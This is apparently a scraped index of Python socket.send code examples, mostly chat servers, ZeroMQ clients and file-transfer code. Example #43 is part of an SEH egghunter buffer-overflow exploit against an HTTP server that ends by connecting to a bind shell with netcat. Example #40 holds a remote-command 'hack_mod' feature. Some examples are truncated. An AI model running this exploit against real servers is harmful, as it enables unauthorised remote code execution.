Example #1
0
def startConfig(socket,address,imei):
    print "{} Connection details IP:Port {}".format(imei,address)
    while True:
        command = raw_input("Enter command to send to device{A10 to F11 commands available}(blank to exit)")
        
        if command == '':
            return False
        command = command.upper()
        data = ""
        while True:
            item = raw_input("Enter data to {} command(blank to exit)".format(command))
            if item == '':
                break
            data += ","+item
        send_command = generateCommand(command,data,imei)
        sent_bytes = socket.send(send_command)
        print "number of characters in command {} number of bytes sent = {}".format(len(send_command),sent_bytes)
        print "Waiting for reply......"
        while True:
            sent_bytes = socket.send(send_command)
            try:        
                reply = socket.recv(4096).split(",")
            except :
                print "No data recived :("
                continue
            
            if reply[2] == command:
                print "Got a reply = {}".format(reply)
                break
            print "Got reply but not relevent :(  = {}".format(reply)
            
        print "Command execute succesfully :) \n"
Example #2
0
 def handle_command( command ):
     arguments = command[1:]
     command = command[0]
     if command == 'help':
         socket.send(b'no help availible\n')
     else:
         socket.send(('unknown command: %s\n' % command).encode('utf8'))
Example #3
0
	def handle_accept(self):
		pair = self.accept()
		if pair is not None:
			socket, address = pair
			print 'Incoming connection from ', address
			handler = ControlHandler(socket)
			socket.send('welcome!\n' + ControlHandler.PROMPT)
Example #4
0
	def send(socket, data):
		'''Encode and send data, who knows why it's so cryptically sent...'''
		try:
			b = []
			b.append(129)

			bytesRaw = data.encode()
			length = len(bytesRaw)
			if length <= 125 :
				b.append(length)
			elif length >= 126 and length <= 65535:
				b.append(126)
				b.append((length >> 8) & 255)
				b.append(length & 255)
			else:
				b.append(127 )
				b.append((length >> 56) & 255)
				b.append((length >> 48) & 255)
				b.append((length >> 40) & 255)
				b.append((length >> 32) & 255)
				b.append((length >> 24) & 255)
				b.append((length >> 16) & 255)
				b.append((length >>  8) & 255)
				b.append(length & 255)

			b = bytes(b)
			b = b + bytesRaw
			print('\033[34m' + data + '\033[0m')
			socket.send(b)
			return True
		except BlockingIOError:
			return False
		except TimeoutError:
			return False
Example #5
0
def request(socket, piece_number, block_offset):
    expected = BLOCK_SIZE

    if piece_number == NUM_PIECES and BLOCK_SIZE >= metainf.get('info').get('piece length'):
       expected = (metainf.get('info').get('length') - (NUM_PIECES * metainf.get('info').get('piece length')))
       print 'expected block size: {}'.format(expected)
    m = struct.pack("!iBiii", 13, 6, piece_number, block_offset, expected)
    while(True):
        socket.send(m)
        data = socket.recv(expected+13)
        if len(data)<13:
            continue
        header = data[:13]
        parsed_header = struct.unpack('!iBii', header)
        if (parsed_header[1] == 7 and 
        (len(data[13:]) == BLOCK_SIZE or len(data[13:]) == expected) and 
        piece_number <= NUM_PIECES and 
        parsed_header[2] == piece_number and 
        parsed_header[3] == block_offset):
            break
        else:
            socket.send(m)

    global counter
    print('block #: {}'.format(counter))
    counter += 1
    print('message length: {}'.format(parsed_header[0]))
    print('message ID: {}'.format(parsed_header[1]))
    print('piece index: {}'.format(parsed_header[2]))
    print('block index: {}'.format(parsed_header[3]))

    payload = data[13:]
    print('size of payload: {}'.format(len(payload)))
    print('\n\n')
    return payload
Example #6
0
def broadcast_data (sock, message, shout = None):
    if shout:
        for socket in CONNECTION_LIST:
            if socket != server_socket and socket != sock :
                for every in user[sock]['rooms']:
                    if every in user[socket]['rooms']:
                        try :
                            socket.send(message)
                        except :
                            # broken socket connection may be, chat client pressed ctrl+c for example
                            print "OH, he gettin removed and shit."
                            socket.close()
                            CONNECTION_LIST.remove(socket)
    else:
        #Do not send the message to master socket and the client who has send us the message
        for socket in CONNECTION_LIST:
            if socket != server_socket and socket != sock :
                if user[socket]['current'] == user[sock]['current']:
                    try :
                        socket.send(message)
                    except :
                        # broken socket connection may be, chat client pressed ctrl+c for example
                        print "OH, he gettin removed and shit."
                        socket.close()
                        CONNECTION_LIST.remove(socket)
Example #7
0
	def broadcast_data (self, message):
		for socket in self.connections:
			if socket != self.server_socket:
				try:
					socket.send( message.encode("utf-8")  ) #.encode("utf-8")
				except:
					pass
Example #8
0
 def handle(self, socket):
     self.set_ready()
     self.logger.debug("Connected to leader")
     client_address = self.client_hostname or socket.getsockname()[0]
     socket.send('%s\n' % client_address)
     # TODO: Use TCP keepalives
     keepalive = self._server_keepalive(socket)
     try:
         for line in util.line_protocol(socket, strip=False):
             if line == '\n':
                 # Keepalive ack from leader
                 keepalive.kill()
                 keepalive = self._server_keepalive(socket)
             else:
                 cluster = json.loads(line)
                 if 'leader' in cluster:
                     # Means you have the wrong leader, redirect
                     host = cluster['leader']
                     port = cluster.get('port', self.leader_address[1])
                     self.leader_address = (host, port)
                     self.logger.info("Redirected to %s:%s..." % 
                                         self.leader_address)
                     raise NewLeader()
                 elif client_address in cluster['cluster']:
                     # Only report cluster once I'm a member
                     self.manager.cluster = set(cluster['cluster'])
                     self.manager.trigger_callback()
         self._leader_election()
     except NewLeader:
         self.manager.trigger_callback()
         if self.leader_address[0] == client_address:
             self.manager.is_leader = True
             self.stop()
         else:
             return
Example #9
0
def broadcast (server_socket, sock, message):

    # sending message to clients
    
    for socket in SOCKET_LIST:
        # send the message only to clients
        if socket != server_socket and socket != sock :
            try :
                socket.send(message)
            except :
                # broken socket connection
                socket.close()
                # broken socket, remove it
                if socket in SOCKET_LIST:
                    SOCKET_LIST.remove(socket)

    #sending to other peers

    for socket in PEER_SERVERS:
        # send the message only to peers
        if socket != server_socket and socket != sock :
            try :
                socket.send(message)
            except :
                # broken socket connection
                socket.close()
                # broken socket, remove it
                if socket in SOCKET_LIST:
                    SOCKET_LIST.remove(socket)
Example #10
0
    def file_send(self, socket):
        print('Thread for client ' + str(socket) + ' started! Waiting for input...')

        # headers = conn.recv(1024)
        # print('headers: %s' % headers)

        # data = self.msg_get(socket)
        # print(data)
        #
        # # socket.send('tarantino.jpg'.encode('utf-8'))
        # self.msg_send(socket, 'tarantino.jpg')
        # print('send filename')
        # # socket.close()

        # socket = self.connect()

        with open(self.default_server_file, 'rb') as file:
            print('File open')
            l = file.read(1024)
            while l:
                socket.send(l)
                # print('sending data...')
                l = file.read(1024)
            print('sending data: END...')
            socket.close()
Example #11
0
    def run(self):
        while True:
            if self.players:
                readers, writers, errorers = select.select(self.sockets.values(), self.sockets.values(), self.sockets.values(), 60)
                # Deal with errors first
                for socket in errorers:
                    self.remove_player(self.players.get(socket, None))

                # Inbound: Data coming from server
                for socket in readers:
                    player = self.players.get(socket, None)
                    if player:
                        data = self.input_buffers.get(player, '') + socket.recv(4096)
                        lines = data.split('\n')
                        self.input_buffers[player] = lines[-1]
                        for line in lines[:-1]:
                            #print '<- %s' % line
                            self.handle_command(player, line)
                        
                # Outbound: Commands going to server
                for player, queue in self.queues.items():
                    try:
                        command = queue.get(False)
                        socket = self.sockets.get(player, None)
                        if socket and socket in writers:
                            #print '-> %s' % command,
                            socket.send(command)
                        queue.task_done()
                    except Empty:
                        pass
                    except Exception, e:
                        print e
Example #12
0
	def initDiffieHellman(self, socket):

		socket.send("connected".encode())

		# Step1: recive the shared primes and the public secret
		step1 = socket.recv(1024)

		if self.__debugflag:
			print(step1)

		# Step 1.1: Parse them
		jsonData = json.loads(step1.decode())
		jsonData = jsonData["dh-keyexchange"]

		self.__dh.base = int(jsonData["base"])
		self.__dh.sharedPrime = int(jsonData["prime"])
		publicSecret = int(jsonData["publicSecret"])

		# Step2: calculate public secret and send to server
		calcedPubSecret = str(self.__dh.calcPublicSecret())
		step2 = "{"
		step2 += "\"dh-keyexchange\":"
		step2 += "{"
		step2 += "\"step\": {},".format(2)
		step2 += "\"publicSecret\": {}".format(calcedPubSecret)
		step2 += "}}"
		socket.send(step2.encode())

		# Step3: calculate the shared secret
		self.__dh.calcSharedSecret(publicSecret)
Example #13
0
def check_connection_completion(sock):
    p = ovs.poller.SelectPoll()
    if sys.platform == "win32":
        event = winutils.get_new_event(None, False, True, None)
        # Receive notification of readiness for writing, of completed
        # connection or multipoint join operation, and of socket closure.
        win32file.WSAEventSelect(sock, event,
                                 win32file.FD_WRITE |
                                 win32file.FD_CONNECT |
                                 win32file.FD_CLOSE)
        p.register(event, ovs.poller.POLLOUT)
    else:
        p.register(sock, ovs.poller.POLLOUT)
    pfds = p.poll(0)
    if len(pfds) == 1:
        revents = pfds[0][1]
        if revents & ovs.poller.POLLERR:
            try:
                # The following should raise an exception.
                socket.send("\0", socket.MSG_DONTWAIT)

                # (Here's where we end up if it didn't.)
                # XXX rate-limit
                vlog.err("poll return POLLERR but send succeeded")
                return errno.EPROTO
            except socket.error as e:
                return get_exception_errno(e)
        else:
            return 0
    else:
        return errno.EAGAIN
Example #14
0
def handle(socket, address):
    """ 处理请求 """
    try:
        data = socket.recv(1024)

        key = binascii.b2a_hex(data[0:16]).upper()

        body = data[16:]

        # RN解密
        rnc = RNC(key)
        data = rnc.decrypt(body)

        data = json.loads(data)
        
        usr = data['usr']
        udid = data['udid']
        
        print 'request from %s' % usr

        user = db.users.find_one({'udid': udid})

        if user and user.get('status'):
            status = 1 
        else:
            status = 0

        # 2、查询mongo
        response = {'udid': udid, 'status': status}
        cipher_text = rnc.encrypt(json.dumps(response))
        socket.send(cipher_text)
    except Exception, e:
    	pass
Example #15
0
def broadcast_data (sock, message):
    """Send broadcast message to all clients other than the
       server socket and the client socket from which the data is received."""
    
    for socket in CONNECTION_LIST:
        if socket != server_socket and socket != sock:            
            socket.send(message)
Example #16
0
def input(events, socket): 
    for event in events:
        direction = ""
        if event.type == QUIT: 
            sys.exit(0) 
        else:
            if(event.type == KEYDOWN):
                if event.key == 118:
                    direction = "s"
                elif event.key == 117:
                    direction = "a"
                elif event.key == 105:
                    direction = "w"
                elif event.key == 97:
                    direction = "d"
                elif event.key == 27:
                    direction = "exit"
            elif(event.type == KEYUP):
                pass
            else:
                print(event)
            if direction == "exit":
                socket.send(direction.encode('utf-8'))
                sys.exit(0)
            elif direction == "":
                pass        
            else:
                socket.send(("position " + direction).encode('utf-8'))
Example #17
0
def get_replay(name, query, config, context=None):
    endpoint = config.get('replay_endpoints', {}).get(name, None)
    if not endpoint:
        raise IOError("No appropriate replay endpoint "
                      "found for {0}".format(name))

    if not context:
        context = zmq.Context(config['io_threads'])

    # A replay endpoint isn't PUB/SUB but REQ/REP, as it allows
    # for bidirectional communication
    socket = context.socket(zmq.REQ)
    try:
        socket.connect(endpoint)
    except zmq.ZMQError as e:
        raise IOError("Error when connecting to the "
                      "replay endpoint: '{0}'".format(str(e)))

    # REQ/REP dance
    socket.send(fedmsg.encoding.dumps(query))
    msgs = socket.recv_multipart()
    socket.close()

    for m in msgs:
        try:
            yield fedmsg.encoding.loads(m)
        except ValueError:
            # We assume that if it isn't JSON then it's an error message
            raise ValueError(m)
Example #18
0
def communicate(socket, cmd, data=None):
    '''Sends a command and optional data (string) to the client socket.
    Message format: [SIZE (4 bytes) | COMMAND (8 bytes) | DATA (N bytes)]
    Returns a tuple containing the response message and data.
    '''
    assert len(cmd) == 8, ('Commands must contain exactly 8 characters.'
                           'Command was: "%s"'%(cmd))
    # Send the message size
    if data is None: 
        data = ''
    msg_size = len(data)
    print '<SERVER> sending msg: [ %s | %s | <DATA: %s bytes> ]'%(msg_size, cmd, len(data))
    nbytes = np.array([msg_size], ">i4").tostring()
    socket.send(nbytes + cmd + data)

    print '<SERVER> waiting for response...'
    # Get the response size
    size = read_nbytes(socket, 4)   
    size = struct.unpack('>i4', size)[0]
    print '<SERVER> response size:', repr(size)
    # Get the response message
    msg = read_nbytes(socket, 8)
    print '<SERVER> response to %s:%s'%(cmd, msg)
    # Get any attached data
    data = ''
    if size > 0:
        data = read_nbytes(socket, size)
    return msg, data
Example #19
0
def getFile(filename):
    context = zmq.Context()
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://localhost:1337")
    socket.send(filename)
    response = socket.recv_json()
    return response
Example #20
0
def localization_client(ip,port):
    context = zmq.Context()
    #  Socket to talk to server
    print "Connecting to localization server ... "
    socket = context.socket(zmq.REQ)
    socket.connect(("tcp://localhost:%d" % port))

    #  Do 10 requests, waiting each time for a response
    while True:
        # print("Sending request %s ... " % request)
        socket.send(b"pose")

        #  Get the reply.
        result = json.loads(socket.recv(1024));

        # printing the result
        # print(result)
        
        # In order to access position : (result["pos"]["x"],result["pos"]["y"],result["pos"]["z"])
        # In order to access orientation : (result["orient"]["w"],result["orient"]["x"],result["orient"]["y"],result["orient"]["z"])
        print "Position    : " , (float(result["pos"]["x"]),float(result["pos"]["y"]),float(result["pos"]["z"]))
        print "Orientation : " , (float(result["orient"]["w"]),float(result["orient"]["x"]),float(result["orient"]["y"]),float(result["orient"]["z"]))

        # wait for a while
        time.sleep(0.050)
Example #21
0
def download_files(socket, working_directory):
    send_en = False
# Firstly, sending requests for downloading and notify servers  
    send_messages(socket, 4)
    if socket.recv(1024) == "What's file name you want":
        file_name = raw_input("Please enter the name of file you want:")
	socket.send(file_name)
# if the server that the requested files exist, get the location of file
	respond = socket.recv(1024)
	if respond == "The requested file exists":
	    location = socket.recv(1024)
	    print "The file is located at " + location
	    send_en = True
	elif respond != "The requested file exists":
	    print "From Server - Error:The requested file doesn't exist"
# If send_en flag is true, begin transmitting files
    if send_en:
        socket.send("Please send file")
	file_name = working_directory + "/" + file_name
	f = open(file_name, "wb")
	content = socket.recv(1024)
#	print content
	while (content):
	    f.write(content)
            content = socket.recv(1024)
            if content == "###":
                break;
Example #22
0
def server(pid, ep):
    """
    Worker for listening socket for communication with web server.

    Parameters
    ----------
    pid: int
        Process id. Used to send SIGINT.
    ep: mp.Pipe endpoint.
        Used to communicate with model processor.
    """
    context = zmq.Context()
    socket = context.socket(zmq.REP)
    port = socket.bind_to_random_port("tcp://0.0.0.0")
    ep.send(port)

    def sig_handler(signum, frame):
        socket.close()
        return

    signal.signal(signal.SIGTERM, sig_handler)

    while True:
        message = socket.recv()
        if message == "KILL":
            socket.send("OK")
            socket.close()
            ep.send(None)
            p = psutil.Process(pid)
            p.send_signal(signal.SIGINT)
            return
Example #23
0
 def parse_line(self, line, socket):
     '''Parses a line from the IRC socket'''
     print(line, flush=True)
     if "PING" in line:
         irc_pong = "PONG %s\r\n" % line[1]
         socket.send(irc_pong.encode('utf-8'))
         return
Example #24
0
def pub_message(source_socket, msg, server_socket):
    for user in USERS_LIST:
        if user[1] == str(source_socket.fileno()):
            nickname = user[3]
            break
    # Do not send the message to server socket and the client who has
    # sent the message
    for socket in SOCKET_LIST:
        if socket != server_socket and socket != source_socket:
            try:
                for user in USERS_LIST:
                    # The user for each specific socket
                    if user[1] == str(socket.fileno()):
                        SYMM_KEY = user[2]
                        CIPHER = AES.new(SYMM_KEY)
                        h_msg = PUB_MESSAGE + ',' + nickname + ',' + msg
                        msg_enc = EncodeAES(CIPHER, h_msg)
                        socket.send(msg_enc)
            except:
                print 'fedeu'
                # broken socket connection may be, chat client pressed ctrl+c
                # for example
                # Remove user from USERS_LIST
                for index, user in enumerate(USERS_LIST):
                    if user[1] == str(source_socket.fileno()):
                        # Close connection
                        source_socket.close()
                        # Remove socket from SOCKET_LIST
                        SOCKET_LIST.remove(source_socket)
                        del USERS_LIST[index]
                        break
Example #25
0
File: ggrok.py Project: Jc2k/ggrok 
    def setup_proxy_connection(self):
        socket = SocketWrapper.connect(self.hostname, self.port)
        socket.send("RegProxy", {
            "ClientId": self.client_id,
        })

        self.logger.debug("Waiting for proxy to be started")

        reply = socket.recv()
        if reply["Type"] != "StartProxy":
            raise ConnectionError("Expected 'StartProxy' but got '%s'" % reply["Type"])

        url = reply["Payload"]["Url"]
        client_addr = reply["Payload"]["ClientAddr"]

        try:
            handler = self._tunnels[url]
        except KeyError:
            self.logger.error("Couldn't find a handler for %r" % url)
            socket.socket.close()
            return

        self.logger.debug("Invoking handler for %r (client=%r)" % (url, client_addr))

        handler(socket.socket, client_addr)
Example #26
0
def send_data(socket):
    while True:
        data = input()
        socket.send(data.encode('utf-8'))
        if(data == 'exit'):
            socket.close()
            break
Example #27
0
def create_join(socket, uname, param):
    """ Joining channels specified. If channel do not exist, creates and joins the channel"""
    cmd, target = param.split(' ', 1)
    chName = target.strip()
    if re.search('^#([a-zA-Z0-9])', chName):
        if not uname in dictUser[chName]:
            if chName in channellist:
                dictUser[chName].append(uname)
		#Done, so that while sending chat msg,only users in that channel can get
		dictSockChannels[socket].append(chName) 
		msg = '\rYou joined %s\n\n' % chName
            else:
                #Create new channel
                channellist.append(chName)
                #add user to the channel
                dictUser[chName].append(uname)
		dictSockChannels[socket].append(chName)
		msg = '\r%s is created.\nYou joined %s\n\n' % (chName,chName)
	    msgToAll = "\r'"+dictSockName[socket]+"'"+ "entered %s \n\n" % chName
	    #Send message to all users in this channel about the entry of new client 	
	    msgtoall(socket,chName,msg,msgToAll)
        else:
            socket.send('\rERR_USERONCHANNEL:%d, %s already on channel %s\n\n' % (ERR_USERONCHANNEL,uname,chName))
    else:
        socket.send('\rERR_INVALIDCHANNELNAME:%d %s Invalid Channel Name\n\n' % (ERR_INVALIDCHANNELNAME,chName))
Example #28
0
def broadcast(source_socket, message, server_socket):
    """Function to broadcast chat messages to all connected clients"""
    # Do not send the message to server socket and the client who has
    # sent the message
    for socket in SOCKET_LIST:
        if socket != server_socket and socket != source_socket:
            try:
                for user in USERS_LIST:
                    # The user for each specific socket
                    if user[1] == str(socket.fileno()):
                        SYMM_KEY = user[2]
                        CIPHER = AES.new(SYMM_KEY)
                        h_msg = BROADCAST + message
                        msg_enc = EncodeAES(CIPHER, h_msg)
                        socket.send(msg_enc)
            except:
                # broken socket connection may be, chat client pressed ctrl+c
                # for example
                # Remove user from USERS_LIST
                for index, user in enumerate(USERS_LIST):
                    if user[1] == str(source_socket.fileno()):
                        # Close connection
                        source_socket.close()
                        # Remove socket from SOCKET_LIST
                        SOCKET_LIST.remove(source_socket)
                        del USERS_LIST[index]
                        break
Example #29
0
def receive_files(socket):
    fileno = socket.recv(512) #receive the number of files to be sent
    print ("Number of files expected: "), fileno
    
    for x in range(0, int(fileno)):
        print("Receiving file "), x+1 , ("of "), fileno
        dat = socket.recv(1024)
        dat = dat.replace("%%%%", getpass.getuser())

        if dat != "null":
            path.append(dat) #get path of incomming file
            time.sleep(0.5)
            size = socket.recv(1024) #get size of file
            print("Receiving "),size,("bytes")
            time.sleep(0.5)
            buff = socket.recv(int(size)) #get actual file content
            print("Writing file to "), path[x-1] 
            f = open(path[x-1], 'wb') #open new file
            f.write(buff) #write content to file.
            print ("File written")
            socket.send('1')
            time.sleep(0.5)
        else:
            print("File number '"),x+1,(" is being ignored by sender.")
            time.sleep(0.5)
                        
    return
Example #30
0
 def fchu(socket,ssid,md5):
     try:
         msg="FCHU"+ssid+md5
         socket.send(msg.encode())
         logging.debug("Inviata fchu")
     except Exception as e:
         raise Exception("Errore invio fchu")
Example #31
0
def send_to_worker(socket, episode_ack_msg):
    episode_ack_msg = pickle.dumps(episode_ack_msg, protocol=-1)
    episode_ack_msg = zlib.compress(episode_ack_msg)
    socket.send(episode_ack_msg)
Example #32
0
 def send_kill_msg(self, socket):
     socket.send(pycompletionserver.MSG_KILL_SERVER)
Example #33
0
def send_msgpack(socket, obj, flags=0, protocol=-1):
    """pickle an object, and zip the pickle before sending it"""
    p = msgpack.packb(obj, use_bin_type=True)
    return socket.send(p, flags=flags)
Example #34
0
def send_zipped_pickle(socket, obj, flags=0, protocol=-1):
    """pickle an object, and zip the pickle before sending it"""
    p = pickle.dumps(obj, protocol)
    z = zlib.compress(p)
    return socket.send(z, flags=flags)
Example #35
0
 def _answer(self, msg, socket):
     socket.send(bytearray(str(msg), "utf-8"))
Example #36
0
import socket

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect(('IP주소', 8080))

while 1:
    data = input()
    socket.send(data.encode())
    data2 = socket.recv(65535)
    print('received data : ', data2.decode())
Example #37
0
import socket

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

socket.connect(('localHost', 5656))

print("Iniciamos Cliente!")

while True:
    mensajeCliente = input("Cliente dice: ")

    socket.send(mensajeCliente.encode(encoding="ascii"))
    respuesta = socket.recv(1024)

    print("servidor", respuesta.decode(encoding="ascii"))

socket.close()
Example #38
0
def handleInput(socket, data):
    socket.send(data)
Example #39
0
def send_cmd(socket, cmdId, args = []):    
    cmdReq = array.array('l', [cmdId] + args)
    socket.send(cmdReq)
Example #40
0
def client():
   money=100
   inte=0
   port = 5566
   n=0
   dev=1
   dba=False
   pss=0
   tmoney=0
   if inte==0:
       print("tentative de connection a votre ami ")
       time.sleep(int(temp))
       import socket
       host2=hostb
       socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       socket.connect((host2,port))
       print("connexion  etablie avec votre ami")
   while inte ==0:
        time.sleep(0.1)
        msg = input(" votre message : ")
        msg1=msg
        socket.send(msg.encode("utf8"))
        if msg1=="send":
            while dev:
                try:
                    name=input(str(("entrer le nom du fichier ou son chemin complet : ")))
                    time.sleep(1)
                    if '/' in name:
                    	nes=0
                    	nes2=0
                    	nes3=0
                    	for nez in name:
                    		if nez=='/':
                    			nes+=1
                    			nes3=nes2
                    		nes2+=1
                    	raw=name[nes3+1:]
                    	print('naw est : ',raw)
                    	fs =open(name,'rb')
                    else:
                    	raw=name
                    	fs =open("virtual/sended/"+name,'rb')
                    break
                except:
                    print("fichier introuvable !!! veillez verifier le fichier ")
            name=raw
            print("envoie de  {} en cours ...".format(name))
            socket.send(name.encode("utf8"))
            s1=time.time()
            socket.sendall(fs.read())
            s2=time.time()
            fs.close()
            print("temps pris pour l'envoye : " ,str(int((s2-s1)))," seconde(s)")
            print(" envoye reussi \n veillez pattienter quelque seconde puis tapez : ok")
            time.sleep(10)
        elif msg1=='sendall':
        	time.sleep(1)
        	name2=input(str(("entrer le chemin complet du dossier a envoyer : ")))

        	try:
        		ch=os.listdir(name2)
        		print(ch)
        		pss=1
        	except:
        		print('chemin specifier invalide !!! ')
        		socket.send('end'.encode("utf8"))
        		pss=0
        	if pss==1:
        		socket.send(str(len(ch)).encode("utf8"))
        	if name2[-1]=='/':
        		pass
        	elif name2[-1]!='/':
        		name2=name2+'/'
        	print(name2)


        elif msg1=="exit":
        	print('deconexion !!!')
        	time.sleep(3)
        	sys.exit()
        elif msg1=='cmd':
        	ck=input('hack_mod <<< ')
        	socket.send(ck.encode("utf8"))
        	tp=socket.recv(1024).decode("utf8")
        	print('return >>>',tp)
        elif msg1=='check':
            if dba==True:
                print('votre montant est de ',str(tmoney))
            else:
                print('aucun transation effectuer precedement !!!')
        elif msg1=='':
        	print('utilisation : \n send ==> pour envoyer un fichier \n money ==> pour envoyer de l\'argent \n exit==> pour fermer le programme \n check==> votre montant money')
        elif msg1=="money":
            deb=1
            msend=input("montant a envoyer : ")
            while deb:
                try:
                    msend=int(msend)
                    deb=0
                except :
                    deb=1
                    msend=input("montant incorrect ; ressayer : ")
            evy=int(msend)
            conn=sqlite3.connect("virtual/system/base.db")
            cur=conn.cursor()
            if dba==False:
	            cur.execute("select money from info")
	            for l in cur:
	                liste_d=l
	            cur.execute("select pseudo from info")
	            for l in cur:
	                liste_s=l
	            cur.execute("select code from info")
	            for l in cur:
	                liste_n=l
	            hmoney=(liste_d[0])
	            cur.execute("select hache from info")
	            for l in cur:
	                liste_h=l
            elif dba==True:pass
            dba=True
            tnum=0
            tb=1
            mdp=getpass.getpass(" entrer  code secret : ")
            mdp=hashlib.sha224((bytes(mdp,'utf8'))).hexdigest()

            if mdp==liste_n[0]: 
                print('verification en cours ...')
                while tb==1:
                    tb2=hashlib.sha224((bytes(str(tnum),'utf8'))).hexdigest()
                    if tb2==hmoney:
                        tb=0
                        tmoney=tnum
                    else:
                        tnum+=1
                if evy > tmoney:
                    envy="0"
                    print(" votre montant est insufisant +{} money d'excedent".format(str(evy-tmoney)))
                elif 0<evy <= tmoney:
                    envy=str(evy)
                    tmoney = tmoney-evy
                    hmoney=hashlib.sha224((bytes(str(tmoney),'utf8'))).hexdigest()
                    don1=(liste_s[0],liste_n[0],hmoney,liste_h[0])
                    cur.execute("insert into info (pseudo,code,money,hache) values(?,?,?,?)",don1)
                    print("montant envoyer ")
                    print("votre montant actuel est de {} money ".format(tmoney))
                else:
                    envy="0"
                    print("une erreur est survenu , transation annuler ")
            else:
                print("mot de passe erronee")
                envy="0"
            socket.sendall(envy.encode("utf8"))
            conn.commit()
            cur.close()
            conn.close()
Example #41
0
import socket

HOST = socket.gethostname()
PORT = 8888
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect(("172.17.2.15", PORT))

text = input('Enter your mesage:')  #take message input from user
socket.send(text.encode('ascii'))  #send message to client

#socket.close()
Example #42
0
def forward_arp(pkt, ip, socket, ts):
    if time_since_arp[ip] == 0 or ((ts - time_since_arp[ip]) > 2):
        if args.v:
            print('forwarding ARP')
        socket.send(pkt)
        time_since_arp[ip] = ts
Example #43
0
#Generated by mona.py v2.0, rev 568 - Immunity Debugger
egg = "w00tw00t"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#NOPS
nops = "\x90"

#Payload
payload = junk + nSEH + SEH + egghunter + nops * 10 + egg + shellcode + nops * (
    6000 - len(junk) - len(nSEH) - len(SEH) - len(egghunter) - 10 - len(egg) -
    len(shellcode))

#HTTP Request
request = "GET /" + payload + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((host, port))
socket.send(request)
socket.close()

print "Waiting for shell..."
time.sleep(10)
os.system("nc " + host + " 4444")
Example #44
0
import socket

socket = socket.socket()

socket.connect(("localhost", 8888))

image = raw_input("Enter Image Name: ")
socket.send(image)

predictedCaptions = socket.recv(1024)

print "Predicted Captions: ", predictedCaptions.split("\t")[0]
print "Time Taken: ", predictedCaptions.split("\t")[1]

socket.close()
Example #45
0
def floodThread(socket, user, text, delay):
	while True:
		socket.send('PRIVMSG ' + user + ' :' + text + '\r\n')
		time.sleep(delay)
		socket.send('PRIVMSG ' + user + ' :' + text + '_' + randomString() + '\r\n')
		time.sleep(delay)
Example #46
0
__author__ = 'ipetrash'

from urllib.parse import urlsplit
import socket
import re

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# url = input ("Enter a url: ")
url = 'http://google.ru/'
try:
    re.search("^http[s]?://.*?", url)
except:
    print("Error")

result = urlsplit(url)
print(result)

socket.connect((result.netloc, 80))

cmd = f'GET {result.path} HTTP/1.0\r\n\r\n'.encode()
print(cmd)
socket.send(cmd)

while True:
    data = socket.recv(512)
    if not len(data):
        break
    print(data, end='')

socket.close()
Example #47
0
    parser.add_argument('--server',
                        type=str,
                        help='server id:port. (eg. 0.0.0.0:1958)',
                        required=True)
    args = parser.parse_args()

    # connect
    context = zmq.Context()
    myid = '%s-%s' % (socket.gethostname(), random_string())
    print("Connecting to server=%s myid=%s" % (args.server, myid))
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://%s" % args.server)

    # request to initialization
    print("Request to initialize.")
    socket.send(byte_message(myid, CODE_INIT, ''), copy=False)
    fetcher = pickle.loads(socket.recv())

    print("Initialized.")

    jobid = data = None
    while True:
        socket.send(byte_message(myid, CODE_POLL, (jobid, data)), copy=False)

        msg = pickle.loads(socket.recv())
        jobid = msg[
            'message']  # list converted to string(eg. "[id1, id2, ...]")
        if jobid is None:
            jobid = data = None
            time.sleep(1)
        else:
Example #48
0
def sendmsg(socket, message, host, port):
    socket.send(message)
Example #49
0
def runServer(socket, serverAddr, clientAddr, port, l, configs):
    # send message back to client to signify a successful connection
    socket.send(bytes('220 Welcome to cs472 hw3 FTP server\r\n', 'ascii'))
    l.log("Sent", "220 Welcome to cs472 hw3 FTP server")

    doUSERandPASS(socket, serverAddr, clientAddr, port, l, configs)
Example #50
0
import socket
import os
import sys
from unbuffered_reading import read_line_unbuffered_from

sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 1)  # Line-buffer output to STDOUT.
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('0.0.0.0', 8080))
listener.listen(5)
while 1:
  try:
    (socket,address) = listener.accept()
    txt = read_line_unbuffered_from(socket).decode('utf8')
    print("FROM THE CLIENT: ")
    while txt != "\r\n":  # i.e., CRLF
      print(txt)
      txt = read_line_unbuffered_from(socket).decode('utf8')
    print("SERVER: reached end of request headers")
    socket.send("HTTP/1.1 200 OK\r\n".encode('utf8'))
    socket.send("\r\n".encode('utf8'))
    socket.send("Hello, world\n".encode('utf8'))
    print("SERVER: Sent 'Hello, world' response to client")
    socket.close()
  except KeyboardInterrupt:
    print("Caught Ctrl-C, exiting...")
    listener.close()
    exit(1)

print("SERVER: now I'm exiting")
Example #51
0
def doPORT(socket_, l, serverAddr, receivedMessage):
    message = receivedMessage[1]
    message = message.split(",")

    if len(message) == 6:
        clientAddr = ".".join(
            message[:4])  # get the ip address from the received message
        dataPort = int(message[4]) * 256 + int(
            message[5])  # get the port number from the received message

        socket_.send(bytes('200 Command OK.\r\n', 'ascii'))
        l.log("Sent", "200 Command OK.\r\n")

        try:
            dataSocket = socket.socket(
                socket.AF_INET,
                socket.SOCK_STREAM)  # create an INET, STREAMing clientSocket
            dataSocket.connect(
                (clientAddr, dataPort)
            )  # connect to a data socket server that's already created in client
